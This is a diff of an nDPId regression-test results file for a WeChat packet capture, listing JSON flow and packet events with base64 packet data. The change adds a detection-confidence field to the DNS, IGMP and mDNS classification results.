 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":58165,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1492171176772,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAABE+U9AAEARvKPAqAFnwKgB\/uM1ADUAMHLoUUIBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":58165,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1573,"source":"wechat.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":58165,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1492171177004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492171177004,"pkt":"8IQvSpdgeJKcD6iOCABFAAA01BhAAEAGIxXAqAFnX2UiIpkbAFBTLvPZ9eqaX4ARCgvXsQAAAQEICgA\/UFFwfB+e"}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1575,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1492171177012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492171177012,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0HRdAAEAG2hbAqAFnX2UiIpknAFAjQjGaFOMj7IARBf68nAAAAQEICgA\/UFNwfIhZ"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1576,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1492171177024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492171177024,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/7BAAEAG933AqAFnX2UiIYi0AFB\/4ffl18M9+4ARCyPk0AAAAQEICgA\/UFZr6XAp"}
@@ -582,116 +582,116 @@
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1492171177380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492171177380,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e6BAAEAGnZvAqAFny82Tq+NyAbsh7o58Fu1nsYARAOW0WAAAAQEICgA\/UK9F3\/Tx"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171177429,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1492171177429,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492171177429,"pkt":"8IQvSpdgeJKcD6iOCABFAABE+fFAAEARvAHAqAFnwKgB\/qk1ADUAMHHYjFIBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171177429,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1591,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171177429,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1600,"source":"wechat.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1492171178268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492171178268,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e6FAAEAGnZrAqAFny82Tq+NyAbsh7o58Fu1nsYARAOWzegAAAQEICgA\/UY1F3\/Tx"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171178741,"flow_last_seen":1492171178741,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171178741,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":56367,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1492171178741,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492171178741,"pkt":"8IQvSpdgeJKcD6iOCABFAABE+rRAAEARuz7AqAFnwKgB\/twvADUAMPgq0wUBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171178741,"flow_last_seen":1492171178741,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171178741,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":56367,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1603,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171178741,"flow_last_seen":1492171178741,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171178741,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":56367,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1620,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1492171183746,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492171183746,"pkt":"8IQvSpdgeJKcD6iOCABFAABE\/1xAAEARtpbAqAFnwKgB\/twvADUAMPgq0wUBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1623,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171184747,"flow_last_seen":1492171184747,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171184747,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":33915,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1623,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1492171184747,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492171184747,"pkt":"8IQvSpdgeJKcD6iOCABFAABEAC1AAEARtcbAqAFnwKgB\/oR7ADUAMLAAcuQBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1623,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171184747,"flow_last_seen":1492171184747,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171184747,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":33915,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1623,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171184747,"flow_last_seen":1492171184747,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171184747,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":33915,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"webpush.web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00535{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1630,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171203806,"flow_last_seen":1492171203806,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1492171203806,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1630,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1492171203806,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"ts_msec":1492171203806,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj\/YAAAEC8ZXAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="}
-00568{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1630,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171203806,"flow_last_seen":1492171203806,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1492171203806,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1630,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171203806,"flow_last_seen":1492171203806,"flow_idle_time":600000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1492171203806,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00536{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1631,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171205448,"flow_last_seen":1492171205448,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171205448,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1631,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1492171205448,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"ts_msec":1492171205448,"pkt":"AQBeAAAWeJKcD6iOCABGwAAoAABAAAECQerAqAFn4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"}
-00569{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1631,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171205448,"flow_last_seen":1492171205448,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171205448,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1631,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171205448,"flow_last_seen":1492171205448,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171205448,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00536{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1632,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171206877,"flow_last_seen":1492171206877,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171206877,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1632,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1492171206877,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"ts_msec":1492171206877,"pkt":"AQBeAAAW0CeIF3AECABGoAAoL+EAAAECUizAqAFk4AAAFpQEAAAiAPsCAAAAAQIAAADgAAD7"}
-00569{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1632,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171206877,"flow_last_seen":1492171206877,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171206877,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1632,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171206877,"flow_last_seen":1492171206877,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171206877,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1633,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1492171208516,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"ts_msec":1492171208516,"pkt":"AQBeAAAW0CeIF3AECABGoAAoL+IAAAECUivAqAFk4AAAFpQEAAAiAOwDAAAAAQIAAADv\/\/\/6"}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1634,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":3,"flow_last_seen":1492171210973,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"ts_msec":1492171210973,"pkt":"AQBeAAAW0CeIF3AECABGoAAoL+UAAAECUijAqAFk4AAAFpQEAAAiAOwAAAAAAQIAAADv\/\/\/9"}
 00536{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1635,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171211383,"flow_last_seen":1492171211383,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171211383,"l3_proto":"ip4","src_ip":"192.168.1.108","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1492171211383,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"ts_msec":1492171211383,"pkt":"AQBeAAAWACSlnnPpCABGwAAoAABAAAECQeXAqAFs4AAAFpQEAAAiAOwDAAAAAQIAAADv\/\/\/6"}
-00569{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1635,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171211383,"flow_last_seen":1492171211383,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171211383,"l3_proto":"ip4","src_ip":"192.168.1.108","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1635,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171211383,"flow_last_seen":1492171211383,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171211383,"l3_proto":"ip4","src_ip":"192.168.1.108","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1636,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171250302,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1636,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1492171250302,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492171250302,"pkt":"AQBeAAD7eJKcD6iOCABFAABESuVAAAERi7nAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="}
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1636,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171250302,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
+00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1636,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171250302,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1637,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171250302,"flow_last_seen":1492171250302,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171250302,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1637,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1492171250302,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"ts_msec":1492171250302,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"}
